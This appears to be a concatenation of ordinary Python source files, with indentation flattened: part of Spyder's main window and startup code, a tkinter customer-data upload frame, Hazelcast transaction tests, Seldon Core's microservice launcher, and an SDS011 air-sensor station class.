is_bootstrap = True
else:
is_bootstrap = False
# Pass variables as environment variables (str) to restarter subprocess
env['SPYDER_ARGS'] = spyder_args
env['SPYDER_PID'] = str(pid)
env['SPYDER_IS_BOOTSTRAP'] = str(is_bootstrap)
env['SPYDER_RESET'] = str(reset)
if DEV:
repo_dir = osp.dirname(spyder_start_directory)
if os.name == 'nt':
env['PYTHONPATH'] = ';'.join([repo_dir])
else:
env['PYTHONPATH'] = ':'.join([repo_dir])
# Build the command and popen arguments depending on the OS
if os.name == 'nt':
# Hide flashing command prompt
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
shell = False
else:
startupinfo = None
shell = True
command = '"{0}" "{1}"'
command = command.format(python, restart_script)
try:
if self.closing(True):
subprocess.Popen(command, shell=shell, env=env,
startupinfo=startupinfo)
self.console.quit()
except Exception as error:
# If there is an error with subprocess, Spyder should not quit and
# the error can be inspected in the internal console
print(error) # spyder: test-skip
print(command) # spyder: test-skip
# ---- Interactive Tours
def show_tour(self, index):
"""Show interactive tour."""
self.maximize_dockwidget(restore=True)
frames = self.tours_available[index]
self.tour.set_tour(index, frames, self)
self.tour.start_tour()
# ---- Global Switcher
def open_switcher(self, symbol=False):
"""Open switcher dialog box."""
if self.switcher is not None and self.switcher.isVisible():
self.switcher.clear()
self.switcher.hide()
return
if symbol:
self.switcher.set_search_text('@')
else:
self.switcher.set_search_text('')
self.switcher.setup()
self.switcher.show()
# Note: The +6 pixel on the top makes it look better
delta_top = (self.toolbars_menu.geometry().height() +
self.menuBar().geometry().height() + 6)
self.switcher.set_position(delta_top)
def open_symbolfinder(self):
"""Open symbol list management dialog box."""
self.open_switcher(symbol=True)
def create_switcher(self):
"""Create switcher dialog instance."""
if self.switcher is None:
from spyder.widgets.switcher import Switcher
self.switcher = Switcher(self)
return self.switcher
# ---- Check for Spyder Updates
def _check_updates_ready(self):
"""Called by WorkerUpdates when ready"""
from spyder.widgets.helperwidgets import MessageCheckBox
        # `feedback` = False is used on startup, so only positive feedback is
        # given. `feedback` = True is used after startup (when using the menu
        # action) and gives feedback whether updates are found or not.
feedback = self.give_updates_feedback
# Get results from worker
update_available = self.worker_updates.update_available
latest_release = self.worker_updates.latest_release
error_msg = self.worker_updates.error
# Release url
url_r = __project_url__ + '/releases/tag/v{}'.format(latest_release)
url_i = 'https://docs.spyder-ide.org/installation.html'
# Define the custom QMessageBox
box = MessageCheckBox(icon=QMessageBox.Information,
parent=self)
box.setWindowTitle(_("New Spyder version"))
box.set_checkbox_text(_("Check for updates at startup"))
box.setStandardButtons(QMessageBox.Ok)
box.setDefaultButton(QMessageBox.Ok)
# Adjust the checkbox depending on the stored configuration
section, option = 'main', 'check_updates_on_startup'
check_updates = CONF.get(section, option)
box.set_checked(check_updates)
if error_msg is not None:
msg = error_msg
box.setText(msg)
box.set_check_visible(False)
box.exec_()
check_updates = box.is_checked()
else:
if update_available:
header = _("<b>Spyder {} is available!</b><br><br>").format(
latest_release)
footer = _(
"For more information visit our "
"<a href=\"{}\">installation guide</a>."
).format(url_i)
if is_anaconda():
content = _(
"<b>Important note:</b> Since you installed "
"Spyder with Anaconda, please <b>don't</b> use "
"<code>pip</code> to update it as that will break "
"your installation.<br><br>"
"Instead, run the following commands in a "
"terminal:<br>"
"<code>conda update anaconda</code><br>"
"<code>conda install spyder={}</code><br><br>"
).format(latest_release)
else:
content = _(
"Please go to <a href=\"{}\">this page</a> to "
"download it.<br><br>"
).format(url_r)
msg = header + content + footer
box.setText(msg)
box.set_check_visible(True)
box.exec_()
check_updates = box.is_checked()
elif feedback:
msg = _("Spyder is up to date.")
box.setText(msg)
box.set_check_visible(False)
box.exec_()
check_updates = box.is_checked()
# Update checkbox based on user interaction
CONF.set(section, option, check_updates)
# Enable check_updates_action after the thread has finished
self.check_updates_action.setDisabled(False)
        # Provide feedback when clicking the menu if check on startup is on
self.give_updates_feedback = True
@Slot()
def show_tour_message(self, force=False):
"""
Show message about starting the tour the first time Spyder starts.
"""
should_show_tour = CONF.get('main', 'show_tour_message')
if force or (should_show_tour and not running_under_pytest()
and not get_safe_mode()):
CONF.set('main', 'show_tour_message', False)
self.tour_dialog = tour.OpenTourDialog(
self, lambda: self.show_tour(DEFAULT_TOUR))
self.tour_dialog.show()
@Slot()
def check_updates(self, startup=False):
"""
Check for spyder updates on github releases using a QThread.
"""
from spyder.workers.updates import WorkerUpdates
# Disable check_updates_action while the thread is working
self.check_updates_action.setDisabled(True)
if self.thread_updates is not None:
self.thread_updates.terminate()
self.thread_updates = QThread(self)
self.worker_updates = WorkerUpdates(self, startup=startup)
self.worker_updates.sig_ready.connect(self._check_updates_ready)
self.worker_updates.sig_ready.connect(self.thread_updates.quit)
self.worker_updates.moveToThread(self.thread_updates)
self.thread_updates.started.connect(self.worker_updates.start)
self.thread_updates.start()
# --- For OpenGL
def _test_setting_opengl(self, option):
"""Get the current OpenGL implementation in use"""
if option == 'software':
return QCoreApplication.testAttribute(Qt.AA_UseSoftwareOpenGL)
elif option == 'desktop':
return QCoreApplication.testAttribute(Qt.AA_UseDesktopOpenGL)
elif option == 'gles':
return QCoreApplication.testAttribute(Qt.AA_UseOpenGLES)
#==============================================================================
# Utilities for the 'main' function below
#==============================================================================
def create_application():
"""Create application and patch sys.exit."""
# Our QApplication
app = qapplication()
# --- Set application icon
app_icon = QIcon(get_image_path("spyder.svg"))
app.setWindowIcon(app_icon)
# Required for correct icon on GNOME/Wayland:
if hasattr(app, 'setDesktopFileName'):
app.setDesktopFileName('spyder')
#----Monkey patching QApplication
class FakeQApplication(QApplication):
"""Spyder's fake QApplication"""
def __init__(self, args):
self = app # analysis:ignore
@staticmethod
def exec_():
"""Do nothing because the Qt mainloop is already running"""
pass
from qtpy import QtWidgets
QtWidgets.QApplication = FakeQApplication
# ----Monkey patching sys.exit
def fake_sys_exit(arg=[]):
pass
sys.exit = fake_sys_exit
# ----Monkey patching sys.excepthook to avoid crashes in PyQt 5.5+
if PYQT5:
def spy_excepthook(type_, value, tback):
sys.__excepthook__(type_, value, tback)
sys.excepthook = spy_excepthook
# Removing arguments from sys.argv as in standard Python interpreter
sys.argv = ['']
return app
def create_window(app, splash, options, args):
"""
Create and show Spyder's main window and start QApplication event loop.
"""
# Main window
main = MainWindow(splash, options)
try:
main.setup()
except BaseException:
if main.console is not None:
try:
main.console.exit_interpreter()
except BaseException:
pass
raise
main.show()
main.post_visible_setup()
if main.console:
namespace = CONF.get('internal_console', 'namespace', {})
main.console.start_interpreter(namespace)
main.console.set_namespace_item('spy', Spy(app=app, window=main))
# Don't show icons in menus for Mac
if sys.platform == 'darwin':
QCoreApplication.setAttribute(Qt.AA_DontShowIconsInMenus, True)
# Open external files with our Mac app
if sys.platform == "darwin":
app.sig_open_external_file.connect(main.open_external_file)
app._has_started = True
if hasattr(app, '_pending_file_open'):
if args:
args = app._pending_file_open + args
else:
args = app._pending_file_open
# Open external files passed as args
if args:
for a in args:
main.open_external_file(a)
# To give focus again to the last focused widget after restoring
# the window
app.focusChanged.connect(main.change_last_focused_widget)
if not running_under_pytest():
app.exec_()
return main
#==============================================================================
# Main
#==============================================================================
def main(options, args):
"""Main function"""
# **** For Pytest ****
if running_under_pytest():
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
app = create_application()
window = create_window(app, None, options, None)
return window
# **** Handle hide_console option ****
if options.show_console:
print("(Deprecated) --show console does nothing, now the default "
" behavior is to show the console, use --hide-console if you "
"want to hide it")
if set_attached_console_visible is not None:
set_attached_console_visible(not options.hide_console
or options.reset_config_files
or options.reset_to_defaults
or options.optimize
or bool(get_debug_level()))
# **** Set OpenGL implementation to use ****
    # This attribute must be set before creating the application.
# See spyder-ide/spyder#11227
if options.opengl_implementation:
option = options.opengl_implementation
set_opengl_implementation(option)
else:
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
# **** Set high DPI scaling ****
# This attribute must be set before creating the application.
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling,
CONF.get('main', 'high_dpi_scaling'))
# **** Set debugging info ****
setup_logging(options)
# **** Create the application ****
app = create_application()
# **** Create splash screen ****
splash = create_splash_screen()
if splash is not None:
splash.show()
splash.showMessage(
_("Initializing..."),
int(Qt.AlignBottom | Qt.AlignCenter | Qt.AlignAbsolute),
QColor(Qt.white)
)
QApplication.processEvents()
if options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults()
return
elif options.optimize:
# Optimize the whole Spyder's source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# **** Read faulthandler log file ****
faulthandler_file = get_conf_path('faulthandler.log')
previous_crash = ''
if osp.exists(faulthandler_file):
with open(faulthandler_file, 'r') as f:
previous_crash = f.read()
# Remove file to not pick it up for next time.
try:
dst = get_conf_path('faulthandler.log.old')
shutil.move(faulthandler_file, dst)
except Exception:
pass
CONF.set('main', 'previous_crash', previous_crash)
# **** Create main window ****
mainwindow = None
try:
if PY3 and options.report_segfault:
import faulthandler
with open(faulthandler_file, 'w') as f:
faulthandler.enable(file=f)
mainwindow = create_window(app, splash, options, args)
else:
mainwindow = create_window(app, splash, options, args)
except FontError:
QMessageBox.information(None, "Spyder",
"Spyder was unable to load the <i>Spyder 3</i> "
"icon theme. That's why it's going to fallback to the "
"theme used in Spyder 2.<br><br>"
"For that, please close this window and start Spyder again.")
CONF.set('appearance', 'icon_theme', 'spyder 2')
if mainwindow is None:
# An exception occurred
if splash is not None:
splash.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
|
frame_top.py
|
from tkinter import Frame, Label, Button, messagebox, filedialog as fd
from tkinter.constants import DISABLED, E, NORMAL, RAISED, SUNKEN, X
import pandas
import requests
from threading import Thread
import json
from messages import messages
from utils import config
from ibuki import Ibuki
class TopFrame(Frame):
def __init__(self, parent):
super().__init__(parent, highlightcolor='black',
highlightthickness=2, padx=10, pady=10)
self.btn_select_input = Button(self, text='Select input file and upload', width=22, bg='yellow',
fg='blue', font=10, cursor='hand2', command=self.select_file)
self.btn_select_input.grid(row=0, column=0)
btn_view = Button(self, text='Extended warranty view',
width=18, bg='yellow', fg='blue', font=10, padx=10, cursor='hand2', command=self.view_extended_warranty_customers)
btn_view.grid(row=0, column=1)
btn_send_sms = Button(self, text='Send SMS', width=10,
bg='yellow', fg='red', font=10, padx=10, cursor='hand2', command=self.send_sms)
btn_send_sms.grid(row=0, column=2, sticky=E)
self.columnconfigure(2, weight=4)
self.columnconfigure(1, weight=2)
def select_file(self):
filetypes = (
('excel files', '*.xlsx'),
('All files', '*.*')
)
try:
select_folder = config.selectFolder or './'
filename = fd.askopenfilename(
title='Open customer data',
initialdir=select_folder,
filetypes=filetypes
)
data = self.get_json(filename)
self.enable_disable_button(self.btn_select_input, False)
s = Thread(target=self.upload_data, args=(data,))
s.start()
        except Exception as error:
messagebox.showerror(
'Error', error or messages.get('errSelectingFile'))
self.enable_disable_button(self.btn_select_input, True)
def get_json(self, filename):
df = pandas.read_excel(filename, converters={'Purchased Date': str, 'Serial No': str}, header=1, usecols=['ASC Code', 'Customer Group', 'Job ID', 'Warranty Type', 'Warranty Category', 'Service Type', 'Product category name',
'Product sub category name', 'Set Model', 'Model Name', 'Serial No', 'Purchased Date', 'Customer Name', 'Mobile No', 'Postal Code', 'Address'
])
json_str = df.to_json(orient='index')
js = json_str.encode('ascii', "ignore").decode()
js = js.replace(u'\\ufeff', '').replace('\\/', '').replace("\'", '')
jsn = json.loads(js)
temp_data = [value for key, value in jsn.items()]
filtered = filter(
lambda value: ('TV' in value.get(
'Product category name', '').upper())
and (value.get('Purchased Date', None) is not None)
and (value.get('Purchased Date', '').strip() != ''), temp_data)
data = [item for item in filtered]
        return data
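    # get_json() returns a list of row dicts keyed by the Excel column names
    # above, keeping only rows whose product category contains "TV" and which
    # have a non-empty 'Purchased Date'.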
def upload_data(self, data):
try:
upload_endpoint = config.uploadEndPoint
requests.post(upload_endpoint, json=data)
messagebox.showinfo("Success", messages['infoUploadSuccess'])
self.enable_disable_button(self.btn_select_input, True)
        except Exception as error:
messagebox.showerror('Error', error or 'Upload error')
self.enable_disable_button(self.btn_select_input, True)
def enable_disable_button(self, btn, isEnabled):
btn.configure(relief=RAISED if isEnabled else SUNKEN)
btn.configure(state=NORMAL if isEnabled else DISABLED)
def view_extended_warranty_customers(self):
Ibuki.emit('VIEW-EXTENDED-WARRANTY-CUSTOMERS', None)
def send_sms(self):
Ibuki.emit('SEND-SMS', None)
def init_top_frame(root):
try:
frame_top = TopFrame(root)
frame_top.pack(fill=X, padx=10, pady=10)
    except Exception as error:
messagebox.showerror('Error', error or messages.get('errGeneric'))
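# Minimal usage sketch (assumes the caller owns the Tk main loop):
#     from tkinter import Tk
#     root = Tk()
#     init_top_frame(root)
#     root.mainloop()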
|
transaction_test.py
|
import time
from threading import Thread
import hazelcast
import hazelcast.transaction
from hazelcast.errors import TransactionError
from tests.base import SingleMemberTestCase
class TransactionTest(SingleMemberTestCase):
@classmethod
def configure_client(cls, config):
config["cluster_name"] = cls.cluster.id
return config
def test_begin_and_commit_transaction(self):
transaction = self.client.new_transaction()
transaction.begin()
self.assertIsNotNone(transaction.id)
self.assertEqual(transaction.state, hazelcast.transaction._STATE_ACTIVE)
transaction.commit()
self.assertEqual(transaction.state, hazelcast.transaction._STATE_COMMITTED)
def test_begin_and_rollback_transaction(self):
transaction = self.client.new_transaction()
transaction.begin()
self.assertIsNotNone(transaction.id)
self.assertEqual(transaction.state, hazelcast.transaction._STATE_ACTIVE)
transaction.rollback()
self.assertEqual(transaction.state, hazelcast.transaction._STATE_ROLLED_BACK)
def test_begin_transaction_twice(self):
transaction = self.client.new_transaction()
transaction.begin()
with self.assertRaises(TransactionError):
transaction.begin()
transaction.rollback()
def test_commit_inactive_transaction(self):
transaction = self.client.new_transaction()
with self.assertRaises(TransactionError):
transaction.commit()
def test_rollback_inactive_transaction(self):
transaction = self.client.new_transaction()
with self.assertRaises(TransactionError):
transaction.rollback()
def test_commit_transaction_twice(self):
transaction = self.client.new_transaction()
transaction.begin()
transaction.commit()
with self.assertRaises(TransactionError):
transaction.commit()
def test_rollback_transaction_twice(self):
transaction = self.client.new_transaction()
transaction.begin()
transaction.rollback()
with self.assertRaises(TransactionError):
transaction.rollback()
def test_commit_from_another_thread(self):
transaction = self.client.new_transaction()
t = Thread(target=transaction.begin)
t.start()
t.join()
with self.assertRaises(TransactionError):
transaction.commit()
def test_rollback_from_another_thread(self):
transaction = self.client.new_transaction()
t = Thread(target=transaction.begin)
t.start()
t.join()
with self.assertRaises(TransactionError):
transaction.rollback()
def test_operations_from_another_thread(self):
transaction = self.client.new_transaction()
ops = [
transaction.get_map,
transaction.get_list,
transaction.get_multi_map,
transaction.get_queue,
transaction.get_set,
]
t = Thread(target=transaction.begin)
t.start()
t.join()
for op in ops:
with self.assertRaises(TransactionError):
op("name")
def test_operations_before_transaction_started(self):
transaction = self.client.new_transaction()
ops = [
transaction.get_map,
transaction.get_list,
transaction.get_multi_map,
transaction.get_queue,
transaction.get_set,
]
for op in ops:
with self.assertRaises(TransactionError):
op("name")
def test_nested_transactions_not_allowed(self):
transaction = self.client.new_transaction()
transaction.begin()
nested_transaction = self.client.new_transaction()
with self.assertRaises(TransactionError):
nested_transaction.begin()
transaction.rollback()
def test_timeout(self):
transaction = self.client.new_transaction(timeout=0.001)
transaction.begin()
time.sleep(0.1)
with self.assertRaises(TransactionError):
transaction.commit()
def test_context_manager(self):
with self.client.new_transaction() as t:
self.assertEqual(t.state, hazelcast.transaction._STATE_ACTIVE)
self.assertEqual(t.state, hazelcast.transaction._STATE_COMMITTED)
def test_context_manager_rollback(self):
with self.assertRaises(RuntimeError):
with self.client.new_transaction() as t:
raise RuntimeError("error")
self.assertEqual(t.state, hazelcast.transaction._STATE_ROLLED_BACK)
|
microservice.py
|
import argparse
import importlib
import json
import logging
import multiprocessing as mp
import os
import sys
import threading
import time
from distutils.util import strtobool
from typing import Callable, Dict
from seldon_core import __version__, persistence
from seldon_core import wrapper as seldon_microservice
from seldon_core.app import (
StandaloneApplication,
UserModelApplication,
accesslog,
post_worker_init,
threads,
)
from seldon_core.flask_utils import ANNOTATIONS_FILE, SeldonMicroserviceException
from seldon_core.metrics import SeldonMetrics
from seldon_core.utils import getenv_as_bool, setup_tracing
logger = logging.getLogger(__name__)
PARAMETERS_ENV_NAME = "PREDICTIVE_UNIT_PARAMETERS"
HTTP_SERVICE_PORT_ENV_NAME = "PREDICTIVE_UNIT_HTTP_SERVICE_PORT"
GRPC_SERVICE_PORT_ENV_NAME = "PREDICTIVE_UNIT_GRPC_SERVICE_PORT"
METRICS_SERVICE_PORT_ENV_NAME = "PREDICTIVE_UNIT_METRICS_SERVICE_PORT"
FILTER_METRICS_ACCESS_LOGS_ENV_NAME = "FILTER_METRICS_ACCESS_LOGS"
LOG_LEVEL_ENV = "SELDON_LOG_LEVEL"
DEFAULT_LOG_LEVEL = "INFO"
DEFAULT_GRPC_PORT = 5000
DEFAULT_HTTP_PORT = 9000
DEFAULT_METRICS_PORT = 6000
DEBUG_ENV = "SELDON_DEBUG"
GUNICORN_ACCESS_LOG_ENV = "GUNICORN_ACCESS_LOG"
def start_servers(
target1: Callable, target2: Callable, target3: Callable, metrics_target: Callable
) -> None:
"""
Start servers
Parameters
----------
target1
Main flask process
target2
Auxilary flask process
"""
p2 = None
if target2:
p2 = mp.Process(target=target2, daemon=True)
p2.start()
p3 = None
if target3:
p3 = mp.Process(target=target3, daemon=True)
p3.start()
p4 = None
if metrics_target:
p4 = mp.Process(target=metrics_target, daemon=True)
p4.start()
target1()
if p2:
p2.join()
if p3:
p3.join()
if p4:
p4.join()
def parse_parameters(parameters: Dict) -> Dict:
"""
Parse the user object parameters
Parameters
----------
parameters
Returns
-------
"""
type_dict = {
"INT": int,
"FLOAT": float,
"DOUBLE": float,
"STRING": str,
"BOOL": bool,
}
parsed_parameters = {}
for param in parameters:
name = param.get("name")
value = param.get("value")
type_ = param.get("type")
if type_ == "BOOL":
parsed_parameters[name] = bool(strtobool(value))
else:
try:
parsed_parameters[name] = type_dict[type_](value)
except ValueError:
raise SeldonMicroserviceException(
"Bad model parameter: "
+ name
+ " with value "
+ value
+ " can't be parsed as a "
+ type_,
reason="MICROSERVICE_BAD_PARAMETER",
)
except KeyError:
raise SeldonMicroserviceException(
"Bad model parameter type: "
+ type_
+ " valid are INT, FLOAT, DOUBLE, STRING, BOOL",
reason="MICROSERVICE_BAD_PARAMETER",
)
return parsed_parameters
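# Illustrative example (hypothetical parameter values):
#     parse_parameters([{"name": "max_depth", "value": "5", "type": "INT"},
#                       {"name": "verbose", "value": "true", "type": "BOOL"}])
# returns {"max_depth": 5, "verbose": True}.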
def load_annotations() -> Dict:
"""
Attempt to load annotations
Returns
-------
"""
annotations = {}
try:
if os.path.isfile(ANNOTATIONS_FILE):
with open(ANNOTATIONS_FILE, "r") as ins:
for line in ins:
line = line.rstrip()
parts = list(map(str.strip, line.split("=", 1)))
if len(parts) == 2:
key = parts[0]
value = parts[1][1:-1] # strip quotes at start and end
logger.info("Found annotation %s:%s ", key, value)
annotations[key] = value
else:
logger.info("Bad annotation [%s]", line)
    except Exception:
logger.error("Failed to open annotations file %s", ANNOTATIONS_FILE)
return annotations
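# The annotations file is expected to hold one key="value" pair per line; the
# surrounding quotes are stripped above and malformed lines are logged and
# skipped.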
class MetricsEndpointFilter(logging.Filter):
def filter(self, record):
return seldon_microservice.METRICS_ENDPOINT not in record.getMessage()
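# This filter drops access-log records that mention the metrics endpoint so
# frequent scrapes (e.g. by Prometheus) do not flood the werkzeug and gunicorn
# access logs.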
def setup_logger(log_level: str, debug_mode: bool) -> logging.Logger:
# set up log level
log_level_raw = os.environ.get(LOG_LEVEL_ENV, log_level.upper())
log_level_num = getattr(logging, log_level_raw, None)
if not isinstance(log_level_num, int):
raise ValueError("Invalid log level: %s", log_level)
logger.setLevel(log_level_num)
# Set right level on access logs
flask_logger = logging.getLogger("werkzeug")
flask_logger.setLevel(log_level_num)
if getenv_as_bool(FILTER_METRICS_ACCESS_LOGS_ENV_NAME, default=not debug_mode):
flask_logger.addFilter(MetricsEndpointFilter())
gunicorn_logger = logging.getLogger("gunicorn.access")
gunicorn_logger.addFilter(MetricsEndpointFilter())
logger.debug("Log level set to %s:%s", log_level, log_level_num)
# set log level for the imported microservice type
seldon_microservice.logger.setLevel(log_level_num)
logging.getLogger().setLevel(log_level_num)
for handler in logger.handlers:
handler.setLevel(log_level_num)
return logger
def main():
LOG_FORMAT = (
"%(asctime)s - %(name)s:%(funcName)s:%(lineno)s - %(levelname)s: %(message)s"
)
logging.basicConfig(level=logging.INFO, format=LOG_FORMAT)
logger.info("Starting microservice.py:main")
logger.info(f"Seldon Core version: {__version__}")
sys.path.append(os.getcwd())
parser = argparse.ArgumentParser()
parser.add_argument("interface_name", type=str, help="Name of the user interface.")
parser.add_argument(
"--service-type",
type=str,
choices=["MODEL", "ROUTER", "TRANSFORMER", "COMBINER", "OUTLIER_DETECTOR"],
default="MODEL",
)
parser.add_argument("--persistence", nargs="?", default=0, const=1, type=int)
parser.add_argument(
"--parameters", type=str, default=os.environ.get(PARAMETERS_ENV_NAME, "[]")
)
parser.add_argument(
"--log-level",
type=str,
choices=["DEBUG", "INFO", "WARNING", "ERROR"],
default=DEFAULT_LOG_LEVEL,
help="Log level of the inference server.",
)
parser.add_argument(
"--debug",
nargs="?",
type=bool,
default=getenv_as_bool(DEBUG_ENV, default=False),
const=True,
help="Enable debug mode.",
)
parser.add_argument(
"--tracing",
nargs="?",
default=int(os.environ.get("TRACING", "0")),
const=1,
type=int,
)
# gunicorn settings, defaults are from
# http://docs.gunicorn.org/en/stable/settings.html
parser.add_argument(
"--workers",
type=int,
default=int(os.environ.get("GUNICORN_WORKERS", "1")),
help="Number of Gunicorn workers for handling requests.",
)
parser.add_argument(
"--threads",
type=int,
default=int(os.environ.get("GUNICORN_THREADS", "10")),
help="Number of threads to run per Gunicorn worker.",
)
parser.add_argument(
"--max-requests",
type=int,
default=int(os.environ.get("GUNICORN_MAX_REQUESTS", "0")),
help="Maximum number of requests gunicorn worker will process before restarting.",
)
parser.add_argument(
"--max-requests-jitter",
type=int,
default=int(os.environ.get("GUNICORN_MAX_REQUESTS_JITTER", "0")),
help="Maximum random jitter to add to max-requests.",
)
parser.add_argument(
"--single-threaded",
type=int,
default=int(os.environ.get("FLASK_SINGLE_THREADED", "0")),
help="Force the Flask app to run single-threaded. Also applies to Gunicorn.",
)
parser.add_argument(
"--http-port",
type=int,
default=int(os.environ.get(HTTP_SERVICE_PORT_ENV_NAME, DEFAULT_HTTP_PORT)),
help="Set http port of seldon service",
)
parser.add_argument(
"--grpc-port",
type=int,
default=int(os.environ.get(GRPC_SERVICE_PORT_ENV_NAME, DEFAULT_GRPC_PORT)),
help="Set grpc port of seldon service",
)
parser.add_argument(
"--metrics-port",
type=int,
default=int(
os.environ.get(METRICS_SERVICE_PORT_ENV_NAME, DEFAULT_METRICS_PORT)
),
help="Set metrics port of seldon service",
)
parser.add_argument(
"--pidfile", type=str, default=None, help="A file path to use for the PID file"
)
parser.add_argument(
"--access-log",
nargs="?",
type=bool,
default=getenv_as_bool(GUNICORN_ACCESS_LOG_ENV, default=False),
const=True,
help="Enable gunicorn access log.",
)
args, remaining = parser.parse_known_args()
if len(remaining) > 0:
logger.error(
f"Unknown args {remaining}. Note since 1.5.0 this CLI does not take API type (REST, GRPC)"
)
sys.exit(-1)
parameters = parse_parameters(json.loads(args.parameters))
setup_logger(args.log_level, args.debug)
# set flask trace jaeger extra tags
jaeger_extra_tags = list(
filter(
lambda x: (x != ""),
[tag.strip() for tag in os.environ.get("JAEGER_EXTRA_TAGS", "").split(",")],
)
)
logger.info("Parse JAEGER_EXTRA_TAGS %s", jaeger_extra_tags)
annotations = load_annotations()
logger.info("Annotations: %s", annotations)
parts = args.interface_name.rsplit(".", 1)
if len(parts) == 1:
logger.info("Importing %s", args.interface_name)
interface_file = importlib.import_module(args.interface_name)
user_class = getattr(interface_file, args.interface_name)
else:
logger.info("Importing submodule %s", parts)
interface_file = importlib.import_module(parts[0])
user_class = getattr(interface_file, parts[1])
if args.persistence:
logger.info("Restoring persisted component")
user_object = persistence.restore(user_class, parameters)
persistence.persist(user_object, parameters.get("push_frequency"))
else:
user_object = user_class(**parameters)
http_port = args.http_port
grpc_port = args.grpc_port
metrics_port = args.metrics_port
# if args.tracing:
# tracer = setup_tracing(args.interface_name)
seldon_metrics = SeldonMetrics(worker_id_func=os.getpid)
# TODO why 2 ways to create metrics server
# seldon_metrics = SeldonMetrics(
# worker_id_func=lambda: threading.current_thread().name
# )
if args.debug:
# Start Flask debug server
def rest_prediction_server():
app = seldon_microservice.get_rest_microservice(user_object, seldon_metrics)
try:
user_object.load()
except (NotImplementedError, AttributeError):
pass
if args.tracing:
logger.info("Tracing branch is active")
from flask_opentracing import FlaskTracing
tracer = setup_tracing(args.interface_name)
logger.info("Set JAEGER_EXTRA_TAGS %s", jaeger_extra_tags)
FlaskTracing(tracer, True, app, jaeger_extra_tags)
app.run(
host="0.0.0.0",
port=http_port,
threaded=False if args.single_threaded else True,
)
logger.info(
"REST microservice running on port %i single-threaded=%s",
http_port,
args.single_threaded,
)
server1_func = rest_prediction_server
else:
# Start production server
def rest_prediction_server():
options = {
"bind": "%s:%s" % ("0.0.0.0", http_port),
"accesslog": accesslog(args.access_log),
"loglevel": args.log_level.lower(),
"timeout": 5000,
"threads": threads(args.threads, args.single_threaded),
"workers": args.workers,
"max_requests": args.max_requests,
"max_requests_jitter": args.max_requests_jitter,
"post_worker_init": post_worker_init,
}
if args.pidfile is not None:
options["pidfile"] = args.pidfile
app = seldon_microservice.get_rest_microservice(user_object, seldon_metrics)
UserModelApplication(
app,
user_object,
jaeger_extra_tags,
args.interface_name,
options=options,
).run()
logger.info("REST gunicorn microservice running on port %i", http_port)
server1_func = rest_prediction_server
def grpc_prediction_server():
if args.tracing:
from grpc_opentracing import open_tracing_server_interceptor
logger.info("Adding tracer")
tracer = setup_tracing(args.interface_name)
interceptor = open_tracing_server_interceptor(tracer)
else:
interceptor = None
server = seldon_microservice.get_grpc_server(
user_object,
seldon_metrics,
annotations=annotations,
trace_interceptor=interceptor,
)
try:
user_object.load()
except (NotImplementedError, AttributeError):
pass
server.add_insecure_port(f"0.0.0.0:{grpc_port}")
server.start()
logger.info("GRPC microservice Running on port %i", grpc_port)
while True:
time.sleep(1000)
server2_func = grpc_prediction_server
def rest_metrics_server():
app = seldon_microservice.get_metrics_microservice(seldon_metrics)
if args.debug:
app.run(host="0.0.0.0", port=metrics_port)
else:
options = {
"bind": "%s:%s" % ("0.0.0.0", metrics_port),
"accesslog": accesslog(args.access_log),
"loglevel": args.log_level.lower(),
"timeout": 5000,
"max_requests": args.max_requests,
"max_requests_jitter": args.max_requests_jitter,
"post_worker_init": post_worker_init,
}
if args.pidfile is not None:
options["pidfile"] = args.pidfile
StandaloneApplication(app, options=options).run()
logger.info("REST metrics microservice running on port %i", metrics_port)
metrics_server_func = rest_metrics_server
if hasattr(user_object, "custom_service") and callable(
getattr(user_object, "custom_service")
):
server3_func = user_object.custom_service
else:
server3_func = None
logger.info("Starting servers")
start_servers(server1_func, server2_func, server3_func, metrics_server_func)
if __name__ == "__main__":
main()
|
comstation.py
|
import threading
import nacl.signing
import time
import typing as tp
import logging.config
from .istation import IStation, StationData, STATION_VERSION, Measurement
from ..drivers.sds011 import SDS011_MODEL, SDS011
from collections import deque
from connectivity.config.logging import LOGGING_CONFIG
logging.config.dictConfig(LOGGING_CONFIG)
logger = logging.getLogger("sensors-connectivity")
def _read_data_thread(sensor: SDS011, q: deque, timeout: int) -> None:
while True:
meas = sensor.query()
timestamp = int(time.time())
q.append((meas, timestamp))
time.sleep(timeout)
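# The reader thread above is a simple producer: COMStation passes a deque with
# maxlen=1, so only the most recent (measurement, timestamp) pair is kept and
# get_data() always reports the freshest sample.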
class COMStation(IStation):
"""
Reads data from a serial port
"""
def __init__(self, config: dict) -> None:
super().__init__(config)
self.version: str = f"airalab-com-{STATION_VERSION}"
self.sensor: SDS011 = SDS011(config["comstation"]["port"])
work_period: int = int(config["comstation"]["work_period"])
self.sensor.set_work_period(work_time=int(work_period / 60))
        self.geo: tp.List[float] = [0, 0]
if config["comstation"]["geo"]:
self.geo = config["comstation"]["geo"].split(",")
if "public_key" in config["comstation"] and config["comstation"]["public_key"]:
self.public = config["comstation"]["public_key"]
else:
signing_key = nacl.signing.SigningKey.generate()
verify_key = signing_key.verify_key
self.public = bytes(verify_key).hex()
logger.info(f"COMStation public key: {self.public}")
self.meas_data = {"pm25": 0, "pm10": 0, "timestamp": 0}
self.q = deque(maxlen=1)
threading.Thread(
target=_read_data_thread, args=(self.sensor, self.q, work_period)
).start()
def get_data(self) -> tp.List[StationData]:
meas = Measurement(self.public, SDS011_MODEL, 0, 0, self.meas_data)
if self.q:
values = self.q[0]
pm = values[0]
self.meas_data.update(
{"pm25": pm[0], "pm10": pm[1], "timestamp": values[1]}
)
meas = Measurement(
self.public,
SDS011_MODEL,
float(self.geo[0]),
float(self.geo[1]),
self.meas_data,
)
return [
StationData(
self.version, self.mac_address, time.time() - self.start_time, meas
)
]
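# Minimal usage sketch (hypothetical config values; requires an SDS011 sensor
# on the given serial port and whatever extra fields IStation.__init__ reads):
#     station = COMStation({"comstation": {"port": "/dev/ttyUSB0",
#                                          "work_period": 300, "geo": ""}})
#     print(station.get_data())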
|
threadpools.py
|
